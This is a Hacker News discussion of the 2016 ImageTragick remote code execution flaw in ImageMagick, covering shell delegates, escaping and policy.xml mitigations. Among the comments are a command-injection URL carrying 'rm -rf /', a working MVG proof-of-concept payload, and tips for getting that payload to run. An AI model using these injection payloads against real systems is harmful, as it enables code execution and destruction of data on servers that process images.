Remote code execution vulnerability in ImageMagick (imagetragick.com)
478 points by nthitz on May 3, 2016 | hide | past | favorite | 230 comments



So judging by this commit[1] and this line[2] I reckon you could somehow escape the "wget" command (assuming that's what it invokes here[3]). The following characters were removed in the commit: ' ', '"', "'", '`', '<', '\\', '>'.

If so then it's not complicated file formats or buffer overflows, it's an improperly escaped 'system' call being fed user input in an obscure feature that probably shouldn't have been included in the first place. Party like it's 1999 guys.

Edit: I'm pretty sure this is an RCE issue. This function[4] replaces the placeholders in the wget command, which is this: `wget -q -O "%o" "https:%M"`

So seeing as %M is user controlled we can feed it a URL like "//hacker.com/`rm -rf /`" and it will blindly pass it to the shell. Wow.

1. https://github.com/ImageMagick/ImageMagick/commit/a347456a1e...

2. https://github.com/ImageMagick/ImageMagick/blob/e93e339c0a44...

3. https://github.com/ImageMagick/ImageMagick/blob/e93e339c0a44...

4. https://github.com/ImageMagick/ImageMagick/blob/32bdefdc31f1...


Explain to me like I'm 5 years old: why is an Image utility invoking shell code and other applications?

Shouldn't this type of utility rather be a library if it's to be used from other applications such as web apps?


ImageMagick shells out to "delegates" to convert to/from many of the formats it supports: reading in a PDF results in a call to "gs", reading in a .docx results in a call to "soffice --headless", etc.

As for the wisdom of this approach...


This must expose an absolutely massive attack surface. Time to disable all these "delegates".


It's really a command-line tool at its heart. The library is essentially just a wrapper around this command-line tool.

You could feasibly do the same stuff in an interpreted language, but (I suspect) it would be substantially slower than directly running those compiled command-line tools underlying it.


> The library is essentially just a wrapper around this command-line tool.

That sounds bass ackwards if you ask me. A command line tool is usually a thin wrapper around a library, for a reason.

I realize it might seem crazy to duplicate functionality from gs into your library, but then the tool should link against those code bases as libraries instead of calling some gs executable (which of course in turn is just a wrapper around a gs library and so on).

Making a library call to re-scale an image or convert from formatA to formatB shouldn't be a shell execute call to begin with, and it shouldn't be making any shell exec calls of its own.


> That sounds bass ackwards if you ask me. A command line tool is usually a thin wrapper around a library, for a reason.

It's historically grown. The tool came first, the library was tacked on later.

And yes, it's a mess. That's why the much saner GraphicsMagick was forked off it… in 2002. People just never migrated.


GraphicsMagick is pretty lacking in terms of features compared to ImageMagick though, even to this day. I tried using it in a project that had just slightly unconventional image processing requirements and GM just didn't have the capabilities to handle it, whereas ImageMagick did.


It is a bit backwards, yes. As other users pointed out, this is for historical reasons.

That being said, I wouldn't be surprised if porting those things over from compiled languages into the library itself proved to be substantially slower. For high-volume applications, it could very well make the library totally unusable.

I agree that it's a backwards way of doing things in a perfect world, but the perfect is the enemy of the good. Sometimes you've gotta make compromises for reality's sake.


> That being said, I wouldn't be surprised if porting those things over from compiled languages to be a part of the library would prove to be substantially slower.

I must have missed something, I thought ImageMagick was a collection of C libraries and C programs, which in turn occasionally called other libraries and programs (such as gs).

What I meant was that a graphics utility should be a c library that exports functions like

    scale_image(source_image, target_image, scale) 
to be used instead of running a command line utility

    convert image.jpg -resize 0.5
That can't ever be slower, and will sometimes be faster (e.g. to recode an image before inserting it as a blob into a db or sending it over a network you wouldn't even write it to disk).


It's both a library and a series of command-line tools.


So are git, NuGet, etc. Either something is just a library, or it's just a command line tool, or it's a command line tool that uses a library (i.e. the command line tool is a simple wrapper that turns command line arguments into function call parameters, basically).

I have never heard of a program where the command line program is at the heart, and a library is wrapped around it. I can't even imagine how such code would be structured.


Because we can never just let documents simply be documents.


ImageMagick shouldn't have been using /bin/sh or system() in the first place. Instead it should use fork+exec or libpipeline.

http://bonedaddy.net/pabs3/log/2014/02/17/pid-preservation-s... http://libpipeline.nongnu.org/

I expect there may also be option injection vulnerabilities in the code.

http://www.defensecode.com/public/DefenseCode_Unix_WildCards...


Neither of those exists on non-POSIX systems, like NT. ImageMagick supports those natively, however.


So? Use CreateProcess on NT then

Edit: Actually it already does: https://github.com/ImageMagick/ImageMagick/blob/master/Magic...


It seems like CreateProcess uses the one-long-string for the command rather than the POSIX model of one string per argument. Is there any way to run a process on Windows using one string per argument?


Actually, it's (normally) two strings, one for the program image filename and one for the command tail.

* https://msdn.microsoft.com/en-gb/library/windows/desktop/ms6...

A single command tail is the Win32 model at base, as it was the DOS API model before it. (The OS/2 model was multiple command tails, although in practice most programs read no more than just one.) exec*() implementations are layered on top of this, and the argv[] notion is a shared fiction maintained by the runtime libraries of C and C++ implementations.


Security is a spectrum, beware of falling into a https://en.wikipedia.org/wiki/False_dilemma


ISTR NT has other mechanisms for that.


I'm sure there are buffer overflows in ImageMagick - probably lots of them - but yeah, you definitely don't need them. ImageMagick has been so buggy for so long, I'm pretty sure an accidentally corrupted image of a kitten sitting on a dog's head would gain root, dump your database and mail it to full-disclosure.


Perhaps a silly question, but if address space layout randomization (ASLR) is enabled, should it not protect against buffer overflows?


It protects against trivial ones, but advanced buffer overflows can work around ASLR and other protections.


That's where I'm a little confused. Some of the changes (like the ones you've called out here) look pretty clearly like they're designed to counteract maliciously-constructed filenames, but the PR-type page talks instead about testing magic numbers as the way to avoid the issue.

This one [1] seems to deal with ImageMagick's feature that reads the contents of a file into the command line: "The special character '@' at the start of a filename, means replace the filename, with contents of the given file. That is you can read a file containing a list of files!" Again though, that's a filename-based problem, not something you'd use magic number checking to defend against.

Edit: I guess with the "@filename"-based one, you could defend on the basis that the payload will be a text file of filenames, but that seems rickety at best.

1: https://github.com/ImageMagick/ImageMagick/commit/58a2ce1638...


I think they mean use the magic numbers so you can limit to common file formats like jpeg/png/gif/bmp/tiff/etc instead of just dumping everything to imagemagick, which has the side effect of allowing "weirder" things like MVG/MSL which are imagemagick-specific macro languages which let you do things like wget a remote URL.


I get the general idea of doing that, and it makes sense, but it doesn't seem to necessarily match up with what's in ImageMagick's commit history or in their forum post... but would make sense with using the "weird" formats as the initial payload, I suppose.

In particular, ImageMagick accepting MSL directly into convert seems like an extremely straightforward exploit path, so much so that it actually seems unlikely. Their documentation makes it seem like it's designed to use a separate command "conjure," but... some combination of factors is at play here, anyway.


So, given the details now, it seems that the reason the IM commits don't seem to match up is that they didn't really squarely address the problem (in my understanding).


There is no excuse for shell escaping bugs like this. 100% safe and reliable shell escaping is trivial:

  s/'/'\''/g
  s/^/'/
  s/$/'/


Can you provide a demonstration of why this is adequate? It seems like it might still be possible to get single quotes in the input to be interpreted by the shell by putting a backslash in the input.


See the man page for a POSIX-compliant shell, like dash[0], and find the section on single-quoted strings. For example:

> Enclosing characters in single quotes preserves the literal meaning of all the characters (except single quotes, making it impossible to put single-quotes in a single-quoted string).

Note also the following examples, with double-quoted strings:

  $ echo a b c
  a b c
  $ echo "a" "b" "c"
  a b c
  $ echo "a""b""c"
  abc
  $ echo "a" b "c"
  a b c
  $ echo "a"b"c"
  abc
The same concatenation rules apply to single-quoted strings. So, by putting single quotes at the beginning and end of a string, you only need to worry about single quotes within the string. You can "escape" those with '\'', where the first single quote terminates the preceding single-quoted string, the backslash+single-quote pair is a literal unquoted/escaped single quote in the shell, and the final single quote begins single-quoting again for the rest of the string. The three parts are then dequoted and concatenated together back into your original string by the shell.

http://linux.die.net/man/1/dash


I knew about the concatenation rules, but I was missing the fact that backslash does nothing in single-quoted strings.

  $ echo 'hi\'
  hi\


The shell doesn't interpret backslashes at all in a single-quoted string. Therefore, this will indeed do.


`` can invoke subshells


Thar she blows. I've updated my comment, seems like that's the RCE.


wait, why wouldn't you want your image processing library to have the ability to run random processes / shell commands? Oof.

In the meantime, maybe a DONT_RUN_COMMANDS ifdef around every call to fork/system/exec is merited...


fork() and exec() are fine. As long as you aren't running arbitrary binaries, it's pretty hard to mess up (as far as RCE goes). system(), however, is an RCE foot-cannon just waiting to happen. Don't ever use system() unless every argument is static. And even then think long and hard.


libpipeline is a good replacement for the more complex uses of system():

http://libpipeline.nongnu.org/


Thanks for linking to libpipeline; I didn't know about it. The API looks good. However, since it is licensed under the GNU GPL (the initial version was based on code in GNU troff) non-copyleft libraries like ImageMagick are unlikely to adopt it.

If you are looking for a small, standalone, non-copyleft alternative, the closest I can think of is the [exec] command in the Jim Tcl [1] embedded scripting language.

Here is an example (without the error checks you'd have in production code):

  #include "jim.h"

  int main(int argc, char const *argv[])
  {
      Jim_Interp *interp;
      int error;
      Jim_Obj *cmd;

      interp = Jim_CreateInterp();
      Jim_RegisterCoreCommands(interp);
      Jim_InitStaticExtensions(interp);

      // The input redirect below does *not* invoke the POSIX shell. It is handled by Jim Tcl itself.
      cmd = Jim_NewListObj(interp, NULL, 0);
      Jim_ListAppendElement(interp, cmd, Jim_NewStringObj(interp, "exec", -1));
      Jim_ListAppendElement(interp, cmd, Jim_NewStringObj(interp, "awk", -1));
      Jim_ListAppendElement(interp, cmd, Jim_NewStringObj(interp, "1", -1));
      Jim_ListAppendElement(interp, cmd, Jim_NewStringObj(interp, "<", -1));
      Jim_ListAppendElement(interp, cmd, Jim_NewStringObj(interp, "/etc/passwd", -1));

      error = Jim_EvalObj(interp, cmd);
      if (error != JIM_ERR) {
          printf("%s\n", Jim_String(Jim_GetResult(interp)));
      }

      Jim_FreeInterp(interp);
      return error;
  }
While I am a fan of the language and of the "hard and soft layers" approach in general [2], it is a commitment: it requires you to embed the language runtime in your program and learn the basics of the scripting language itself and its C API. The upside is that Jim Tcl's [exec] works on Windows, too (and you get other goodies with Jim like a fast, high quality implementation of strings and hash maps).

Alternatively, you can use the "big" Tcl [3] as a C library. It's larger but more mature and is available in every major Linux distribution.

[1] http://jim.tcl.tk/fossil/doc/trunk/Tcl_shipped.html#_exec

[2] http://c2.com/cgi/wiki?AlternateHardAndSoftLayers

[3] https://tcl.wiki/2074


To elaborate on the above a bit, for me the choice between Jim Tcl and the "big" Tcl 8.x comes down to choosing between vendoring the dependencies and embedding the runtime (Jim Tcl) vs. using the distribution libraries and extending the runtime (Tcl 8).

Either way you get a very fine C library that prevents you from succumbing to Greenspun's tenth rule, so I can only recommend it for most C programs and libraries of sufficient size and complexity.


Jim Tcl is available in the distros; at least Debian, Ubuntu, OpenBSD, FreeBSD, NetBSD, openSUSE, Source Mage, Fedora and Gentoo have it.


Oh yes, it is pretty widely available. What I meant was that it was smaller and easier to vendor: for example, you can produce an SQLite-style amalgamation file for it.


Embedding other languages in C seems like a path worse than system(). You are better off just writing in another language completely.


In my opinion Tcl really straddles the line between a language and a library. I've heard it favorably compared to GLib. When used from C it feels a lot more like a library than other scripting languages do (Tcl 8 even more so than Jim due to a greater C API surface).

I agree with you on writing in another language but presumably you wouldn't be considering libpipeline anyway unless you had to write C. My default approach when I need C to access some API is to write an extension to an interpreter from which to access it. I leave embedding an interpreter in C for when you can't do that.


PoC: save as file.mvg and then run convert file.mvg o.png

  viewbox 0 0 1 1 image over 0,0 0,0 'https://test/" && touch /tmp/hacked && echo "1'


This is what I get on an unpatched staging server. Not sure it did anything...

    $ sudo convert file.mvg o.png
    convert.im6: delegate failed `"curl" -s -k -o "%o" "https:%M"' @ error/delegate.c/InvokeDelegate/1065.
    convert.im6: unable to open image `/tmp/magick-Yjc5q9f1': No such file or directory @ error/blob.c/OpenBlob/2638.
    convert.im6: unable to open file `/tmp/magick-Yjc5q9f1': No such file or directory @ error/constitute.c/ReadImage/583.


If https://test can't be opened by curl then the rest of the commands will fail, because they are chained by &&. If you change the first && to || then it will work.


I assumed that "bug" was added intentionally as a script kiddie deterrence...


Can confirm that I was able to reproduce after tweaking some of the special characters in the above PoC.


Works for me (with a slight bugfix to the .mvg) :O

The policy.xml workaround mentioned here seems to stop it https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2016-3714
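For reference, the policy.xml workaround that was circulating (the same coder list shown in the Red Hat bug; exact pattern names may differ across ImageMagick versions) looks roughly like this:

```xml
<policymap>
  <policy domain="coder" rights="none" pattern="EPHEMERAL" />
  <policy domain="coder" rights="none" pattern="URL" />
  <policy domain="coder" rights="none" pattern="HTTPS" />
  <policy domain="coder" rights="none" pattern="MVG" />
  <policy domain="coder" rights="none" pattern="MSL" />
</policymap>
```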


You can trigger the code execution by just using "less" on the mvg file, as it uses ImageMagick if it's installed :)


Replace `test` with `example.com` et voila.


Full story by one of the 2 finders on the oss-security@openwall mailing list: http://www.openwall.com/lists/oss-security/2016/05/03/18


Would recommend reading the mailing list entry above...it has much more detail than the imagetragick.com site. The "unescaped shell characters" is only one of many issues.


Apparently the Paperclip library already covered this long before this vulnerability was published.

https://github.com/thoughtbot/paperclip/issues/2190#issuecom...


Well, they check the filetype. I wouldn't be so certain that covers all the bases. Read this: http://www.openwall.com/lists/oss-security/2016/05/03/18


Of course I would like to see specific tests that cover everything about this vulnerability. I see now that there are more problems than the one mentioned in the article.

But the link submitted to hackernews specifically mentioned "magic bytes" which is the file type problem. I think Paperclip is not affected on that one.


I wonder if the same issue exists in GraphicsMagick.

Also, I am surprised how few people have switched from ImageMagick to GraphicsMagick, given that the fork happened back in 2002 and that it offers significant improvements.

http://www.graphicsmagick.org/


"it offers significant improvements." - citation needed.

It was better for a period after the fork, but the only guy working on it hasn't maintained it that well...there's a significant number of bugs in GraphicsMagick that have been there for years.


I've always chosen GraphicsMagick over ImageMagick because it has far fewer dependencies on other packages and it provides the features I want.


I've been using GraphicsMagick for a while now. Is that also affected or is it just waiting to be checked for the same bugs?


General consensus so far seems to be that GraphicsMagick is unaffected by this vulnerability.

If security is really important to you though, you should move image processing to separate isolated servers anyway, and verify magic bytes as described by this site.


Quick update: None of the 5 PoCs that were published work on GraphicsMagick for me.

I was checking magic numbers before sending files to GraphicsMagick but I'm going to go through my code again and make sure that this is always happening.


No idea, but I'd assume yes for the time being.

The GraphicsMagick code base includes 3 of the 5 coders that are mentioned (URL, MVG and MSL). 2 of those use LibXML, and url.c suspiciously uses LibXML's nanoftp and nanohttp.


Any idea how to disable those coders with GraphicsMagick? ImageMagick supports a policy file to disable coders (mentioned here https://imagetragick.com/). Would need to do the same for GraphicsMagick


delegates.mgk.in file of GraphicsMagick contains this comment:

  Under Unix, all text (non-numeric) substitutions should be
  surrounded with double quotes for the purpose of security, and
  because any double quotes occuring within the substituted text will
  be escaped using a backslash.

  Commands (excluding file names) containing one or more of the
  special characters ";&|><" (requiring that multiple processes be
  executed) are executed via the Unix shell with text substitutions
  carefully excaped to avoid possible compromise.  Otherwise, commands
  are executed directly without use of the Unix shell.
I assume GraphicsMagick doesn't suffer from this vulnerability.


Perhaps not the unescaped shell characters, but that's not the only hole that was found.


+1 to this. I use GraphicsMagick too and it would be great to know.


I believe Pinterest or that site where you can sell your knitted socks did as well, don't remember.


Not sure why this got downvoted, but I seriously don't remember the name of the second site which used Graphicsmagick extensively in production on a web facing service.


Etsy?

Wasn't Flickr the biggest site using GraphicsMagick?


Yeah, I think Pinterest and/or Etsy were using GraphicsMagick extensively according to some technical presentation or blog post I read a while back.


No PoC, but ImageMagick commit history might lead to some clues https://github.com/ImageMagick/ImageMagick/commits/master

edit: PoC here https://news.ycombinator.com/item?id=11624056 though I haven't run it myself.


Wow, they seem to have terrible commit message practice. The latest commit has a message of "...", and many others only have a bug number (which leads to an annoying usability issue on the github UI - I click the title to get to the commit - which now links to a GitHub issue).

[EDIT: Actually, 8 of the commits top of tree as of writing are "...". wow.]

On top of that, "Second effort to sanitize input string" at [1] appears related to this issue, and doesn't have a single test change, even on the second attempt!

[1]: https://github.com/ImageMagick/ImageMagick/commit/a347456a1e...


Don't they use SVN? http://www.imagemagick.org/script/subversion.php

Maybe github is just a mirror

(edits - nope, looks like they changed recently. perhaps it's a reflection of developers moving from svn to git)


Could this just be due to merges that don't squash commits?


Nope, a very quick check shows very little merge activity - the occasional pull request.

While I was at it, 49 commits using "..." as the message, and 8520 commits with absolutely no message at all.


I didn't realize you _could_ do a git commit without a message. Interesting, even if I can't think of why I'd ever want to.


For Heroku, which has a read-only filesystem for /etc, we did this: https://gist.github.com/yanowitz/8329d8b27d8294ca7027f504326...


It seems that Heroku already took care of this security problem for us. This is a copy-and-paste of a comment that was left on the GitHub page:

seems to be the default on heroku already:

  Path: /etc/ImageMagick/policy.xml  
    Policy: Coder  
      rights: None  
      pattern: EPHEMERAL  
    Policy: Coder  
      rights: None  
      pattern: URL  
    Policy: Coder  
      rights: None  
      pattern: HTTPS  
    Policy: Coder  
      rights: None  
      pattern: MVG  
    Policy: Coder  
      rights: None  
      pattern: MSL


Am I right in assuming, then, that for apps deployed on Heroku this specific reported issue is not a problem?


Well, I am on heroku and I have verified that that file is on my heroku instance, so I assume so.

Is there a tool I can use to verify that my website is protected?


Oh, this is scary. Drupal and WordPress rely on ImageMagick. That amounts to a huge portion of the internet as a whole.


What doesn't? ImageMagick, for me, is the one-stop shop for all kinds of image filters, resizing, recoding, etc.


It's weird. I had to do commandline image manipulation in big batches several years ago. There were two options, netpbm and ImageMagick. I ended up using netpbm (and it's still my preferred solution) after ImageMagick proved to be buggy and much much slower. It always surprised me that people flocked to ImageMagick after that.

I'm completely unsurprised about these bugs given the number of serious problems I ran into. Granted, that was something like 17 years ago, but these veteran projects have a tendency to hang around on life support for decades. Projects that are huge messes don't generally get cleaned up without massive outside pressure (see: openssl).


>It always surprised me that people flocked to ImageMagick after that.

It's an SEO thing. Searching "resize image" would almost always lead to ImageMagick examples that would work well enough to not require looking elsewhere. Almost every time I've used it, it's been for a few simple image operations (downsize, rotate, etc) that happen once on a user upload of a tiny site so performance wasn't a concern.


I've used GM more. For whatever reason I've had quite a few weird problems and performance issues with IM. (It's been quite a while, though.)


Not true, both use the GD library.


To expand on this; they both use GD by default, as it's the most widely-installed library with PHP extensions available out of the box.

But both have plugins/modules that you can use to switch the library to ImageMagick very easily, and some plugins/modules would require ImageMagick for specific functionality.


WordPress uses ImageMagick if available, or falls back to GD (so technically GD is the minimum requirement). This does affect WP.


Yeah a huge number of frameworks do, as well as handcoded php sites.

I work at a hosting company, really hoping this PoC is more complex than is implied in the post. So few people actually patch/update their boxes with any degree of regularity.


I'm aware of a (now defunct) social networking site that used this for creating various image thumbnails and previews. Wouldn't surprise me that there are others.


I wonder what Imgur uses


People might be surprised how commonly used ImageMagick is. This could have a real world impact on a number of projects and services.



The particularly interesting piece to me is the SVG exploit. ImageMagick apparently will try to load xlink'd images referenced from within the SVG and hit the same problem as in the MVG example.

No skin off anybody's nose if they have to block MVGs, but SVG could be somewhat of a loss.


We are currently facing the issue of not being able to use MSVG (ImageMagick's internal SVG renderer). We use it to work around issues with RSVG.

If anyone has a solution for disabling xlink'd images but retaining the rest of MSVG functionality, we'd be all ears.


The "policy.xml" mitigation mentioned in the link (absent MVG, which is required to use MSVG) does seem to fix the specific remote execution bug being discussed here, just because the https delegate can't be used.

But, it doesn't resolve the problem that the internal renderer can be used to read local files and include their contents in the rendered image through the xlink:href. It's not clear to me that there's any way to disable that. The ImageMagick forum post gives an additional policy entry to "prevent indirect reads" but it doesn't seem to have that effect (unless it also requires an updated ImageMagick).

Edit: It... maybe... looks like the "indirect reads" mitigation was very narrowly targeted at the CVE-2016-3717 PoC using "label:@" but that's far from the only way to do local reads once you've got ImageMagick parsing "URLs" inside your input file (hint: there's a txt: coder). I'm honestly not totally sure what that policy is intended to do...

Edit 2: Well, it appears that the "prevent indirect reads" policy does indeed require an updated ImageMagick: "Denying indirect reads with a path policy and a pattern of "@*" is supported in ImageMagick 6.9.3-10 and ImageMagick 7.0.1-1 for those that need to utilize the MVG and MSL coders." I haven't used that version but I still think, judging from what it looks like, that it won't really solve the problem.


We ended up mitigating by sanitising tags+attributes, and validating all xlink:href's in the SVG-XML, using a library like bleach (https://github.com/mozilla/bleach) before passing to ImageMagick.

Probably not a bad thing to be doing anyway.


Has anyone determined if Python Wand is affected also? http://wand-py.org

Edit: Or any other libmagickwand based project for that matter.


Hard problem now: Find all places where ImageMagick is being used and no one knows about.


Given the pain of setting up ImageMagick, it probably cannot go unnoticed anywhere. I tried to use that crap as a library not long ago, and it gave me brain cancer. I stuck with libgd in the end, as that is an actual library: no setup into /bin, /etc, or on Windows into C:\Progra~1, and the library entry points of GD don't look as if they were designed by an oh-so-funny idiot.

http://www.imagemagick.org/script/magick-wand.php

  MagickWandGenesis();
  contrast_wand = NewMagickWand();
  status = MagickReadImage(contrast_wand, argv[1]);

Tell me, please, that this is a sane API - but then please provide me your GitHub account as well, just so I know what to avoid at all costs in the future.

Edit: USE LIBGD: http://libgd.github.io/ It has a friendly API, suggesting sane developers, and the API is easy to use from wrappers (I used it via P/Invoke interop from C# without any hiccups). It looks to me like it was designed to be easily usable that way, which suggests design, not just growing code like cancer.


That's easy. Replacing all the hordes of other handwritten input parsers with formal parsers is the task at hand.

The new bounty will be for proofs of input parser correctness, not exploits.


Also make sure you don't use it for any image formats that are processed by logic with the complexity of a small command-line interpreter. You'll risk a lot of XXE vulns with formats like SVG or MVG. To see some examples of said logic, have a look at 'convert -list delegate', for example.


Shouldn't the HTTP coder also be included? <policy domain="coder" rights="none" pattern="HTTP" />

Also - would an example of using the HTTPS coder be:

  convert https://example.com/rose.jpg ~/rose.png


For our use case, the only input formats we need to support are GIF, JPG and PNG.

Using policy.xml to disable EPHEMERAL, URL, HTTPS, MVG and MSL is a nice start, but is it also possible to disable PDF, open office, FTP and others? Where would I find a list of all the supported coders?


I'm on my phone at the moment but try looking in the files named by the output of "dpkg -L imagemagick-common". There's a bunch of xml files and one of them specifies how all the other commands are invoked, IIRC.


The delegates.xml file looks interesting, and `convert -list delegate` lists a large number of formats that we don't need to support.

I'm not clear on the difference between a "coder" and a "delegate". Do I need to add a policy.xml entry for each delegate?


This Russian forum may contain some clues: http://nowere.net/b/res/127615.html#i129473


Rule of the day: ad hoc parsers are the #1 infosec issue. AFL is the Killer Rabbit. The only defense is writing formal parsers on all inputs.


Does anybody have a library (prefer JavaScript) for inspecting files and extracting the file type using "magic bytes"[1]. Seems like most people probably blindly use mime-type, which appears to be incorrect and insecure.

[1] https://en.wikipedia.org/wiki/List_of_file_signatures




Would using a libmagic based tool to detect the magic bytes and content type be a valid mitigation strategy? The Node library mmmagic (https://github.com/mscdex/mmmagic) already does this.



I love that security vulnerabilities have names now. I think it's great for awareness.

But when you have magic in the software's name you could do better than ImageTragick.

... though none come to me right now


My Little Pwnie: System() is Magick

Magick: The Pwning


Most image file formats are insane. And people expect to convert insane document formats to images, too.

Well. What did you expect?


WordPress's Imagick Image Editor would be a problem?


First Heartbleed, then Badlock and now ImageTragick. Are bugs getting their own domains now?



It's almost like we need a site that indexes them.



Give it some GitHub pages love with a custom domain and re-submit to HN!


I looked at doing that first, but I couldn't figure out how folks could submit PRs against the markdown used to generate the site. I might just be a newb but I can't find a direct way to do it. Suggestions?


I thought the same thing. You can't sensationalize hacking in the news though without a catchy name. I see them as eventual NerdCore band names. Don't forget Shellshock.


The sad thing is, I would probably buy a Heartbleed CD


Not just their own domains, but in this case its own logo and Twitter account. Seems really bizarre to me, I don't get it.


You really don't get why the web is better off if serious bugs are given memorable, human parse-able branding that helps facilitate press coverage and raise awareness among stakeholders, rather than hiding flaws behind opaque identifiers like CVE-117293 that only a handful of people will know enough about to look into?


At this rate it seems to be leading towards a new comedy subgenre, so I'm happy with it.


Whatever helps awareness. Maybe it even gives people outside of tech a hint about how bad things in security really are.


I hate this "branding of security issues" trend, I don't think it adds anything at all to the security process; but there you are.


I wonder why we've been "trademarking" security issues since Heartbleed.


Easier to remember and talk about. I'm not going to remember CVE-2016-3714, but ImageTragick is catchy.


Otherwise no one cares.


So, we get it. Complicated file and network formats, handled in C code leads to these types of security issues.

We are told that Rust will save us. Glib answer - if it was going to, it already would have (and this is from someone already writing Rust code).

I hope it will lead to a change on two fronts:

1. Simpler formats for file representation and data interchange. When someone tries to add an extra bitfield option, say no. When they keep trying, get a wooden stick with "no" written on it. Part of the disease of modern computing is bloated specs.

2. Restrictive not permissive code bases. Exit and bail out early. Tell the user "file corrupted". Push back.


> 1. Simpler formats for file representation and data interchange. When someone tries to add an extra bitfield option, say no. When they keep trying, get a wooden stick with "no" written on it. Part of the disease of modern computing is bloated specs.

How is creating new image formats and getting the entire Web to adopt them easier than making more secure image decoders?

It's especially irrelevant to this series of vulnerabilities, since they work by getting ImageMagick to parse less popular image formats. Inventing new ones won't do anything to mitigate these flaws.

> if it was going to, it already would have (and this is from someone already writing Rust code).

I don't understand what this is trying to imply.


The 'Magick' in this case is less welcome when your system is pwned. Maybe less magic in formats and tools would mean, I don't know, fewer vectors for compromise.

We had better options before and after C, yet here we are. Not to piss on Rust's parade, but it may prove not to be the white knight of code hoped for. And I like Rust; I am probably just less emotionally clouded in my viewpoint.


I don't see anything in this comment that is responsive to anything I wrote.


It is a shame, a second read may have helped.


I agree to the extent that "Rust will save us" is a glib answer, but dismissing it completely is equally silly – safe-by-default is an excellent tool to help prevent many of the common sort of vulnerabilities we see in C code.

I don't really agree with the rest. "Simple file formats" is a theoretically nice idea which is impractical – after all, features are added to file formats for a reason. "Restrictive not permissive" is, as others have pointed out, a divergence from the generally useful Postel's law. Writing a library which cannot handle common problems in file formats – of which there are a huge number, due to sloppy implementation – is a good way to ensure you have developed a library which will be used by few.


>I agree to the extent that "Rust will save us" is a glib answer, but dismissing it completely is equally silly – safe-by-default is an excellent tool to help prevent many of the common sort of vulnerabilities we see in C code.

There have been all sorts of safe languages that are appropriate for image processing and other types of programs, but people apparently like programming in C more than they like secure software. It is hard to see how something like Common-Lisp/Ocaml/Haskell/Java/Eiffel/C#/Ada wouldn't be more than up to the task, with only a slight speed penalty. It seems more like a social issue than a technical one. Maybe Rust will finally be able to break through, but I wouldn't hold your breath.


Because Rust has a C ABI and no runtime. All of the others carry a runtime (except for Ada, which was always niche).


By "not holding your breath" do you mean "just write your code in C?"


Regarding point 2, I think we need to consider Postel's Law a design antipattern, rather than a hallmark of good design. From now on, good software should not be permissive in what it accepts, because there is no good way to guarantee that such permissiveness will not lead to security breaches down the line.


Counterpoint: Literally the only thing that allows forward compatibility on the web is permissiveness. When a browser sees something like this in CSS,

    .foo {
      someprop: boring-old-value;
      someprop: awesome-new-value;
    }
instead of old browsers that don't understand just throwing a fit and dying, they ignore stuff they don't understand and carry on. So we know that a browser which doesn't implement 'someprop: awesome-new-value' will go ahead and read 'someprop: boring-old-value' instead of stopping processing of the CSS, or worse, emitting an error and refusing to render the page altogether. Without this, it would effectively be impossible to ship new web features until old browsers had died off to <epsilon-of-users-we-don't-care-about>.


There's a crucial distinction to be made. Ignoring unknown properties is a defined part of the CSS spec, so implementing it that way is just being correct. Postel's Law leads to trouble when "being liberal" means unilaterally extending the spec in ill-defined and ultimately incompatible ways. Example: autocorrecting "awesome-new-value" to its closest known match "alternative-old-value".


I'll agree that Postel's Law should not be interpreted as "when something doesn't fit, force it". The most effective examples tend to have a duality: areas where permissiveness is allowed and areas where it's constrained. (E.g. The CSS/JSON must be well-formed, but the properties can vary.)

Getting underneath the patterns and anti-patterns of permissiveness in an informed way is a lot more useful IMO than the knee-jerk reaction of declaring all permissiveness harmful and running away. Especially in light of the web's incredible wins via this strategy.


From a purely financial point of view, you may well be right: the technical and social benefits of clean, elegant, reliable, correct software probably don't justify sacrificing something as profitable as the permissiveness of the Web.

But these are pretty damn twisted priorities. A little bit of social responsibility wouldn't hurt.


I would disagree with that greatly. Postel's law says there's no need to excessively constrain what's considered valid input, not to ignore basic bounds checking and security.

Not following Postel's law would result in brittle system components that break when other parts of the system evolve.


>Not following Postel's law would result in brittle system components that break when other parts of the system evolve.

This depends how much graceful degradation you have available to you. In systems/domains where little is available, following Postel's law can result in silent failures rather than explicit/loud ones. The question isn't whether they break or how brittle they are, but whether you will notice whether they did break. Each system exists within a range on a continuum of how acceptable Postel's law is.


Also, just because Postel's law worked for a small group of highly skilled systems programmers implementing common infrastructure for everyone, it doesn't automatically follow that it will work for a large and fast growing group of programmers of wildly varying skill, each implementing their own or their employer's brilliant business idea.


>Not following Postel's law would result in brittle system components that break when other parts of the system evolve.

Being liberal in what you accept is precisely the definition of brittle: if there's an update that reduces the set of representable input data, but you keep the code that processes the user's input into data, then an untested, little-used edge case could invalidate your assumptions about the rest of the system.


Additionally, being conservative in what you accept forces people to be conservative in what they emit upstream. Win-win!


Tell that to HTML engines ;P


Has any browser implementor ever given it a serious try?


XHTML?


Reply to sibling: “Did any browser reject poorly formed XHTML?” Yes, they did, if the XHTML was served with a MIME type of application/xhtml+xml.

However, this MIME type was extremely rare because MSIE would not show a web page unless the MIME type was text/html.

Furthermore, the extreme brittleness of XHTML was generally regarded as a Bad Move as one single URL in your source code with a literal ampersand instead of &amp; would cause a complete and total breakage of your web page. Of course, many web pages are crummily concatenated strings and there are a lot of web devs who would never be able to reliably generate 100% XHTML-compliant output. Shit, pasting in a snippet of HTML where the BR tags omitted the self-closing slash would break your XHTML validation.

tl;dr: Yes, and it sucked


See second reply to seba_dos1.


That wasn't serious enough. Did any browser ever reject a Web page just because it wasn't well-formed XHTML?

Basically, give people a hand, and they'll grab your whole arm. It's human nature, and Web developers aren't above it.


>Did any browser ever reject a Web page just because it wasn't well-formed XHTML?

Of course. If you served XHTML properly (by setting "application/xhtml+xml" MIME type), ill-formed XHTML would just show you a big syntax error instead of the page. Try it, that's still the case.

Even when their own markup was well-formed, lots of sites still used the "text/html" type to trigger the HTML (SGML) parser instead of the XML one, since any ill-formed 3rd-party code embedded into the website would of course crash the page as well.

That was one of the reasons why XHTML never got popular and eventually has been abandoned.


That still wasn't serious enough. All it took to get browsers to accept non-XHTML pages was to change the MIME type. What I'm talking about is simply not displaying ill-formed pages at all, under any circumstances.


But with that MIME type it wasn't XHTML at all. It was being parsed as HTML, which was possible only because of the big similarity between those two formats. All you need to ensure the behavior you want is to disable HTML parsing (whose specification pretty much mandates being liberal in what the parser accepts).


That would be madness. Imagine a browser that did that, or that crashed the tab in case of a JS error. There would be no pages left :P


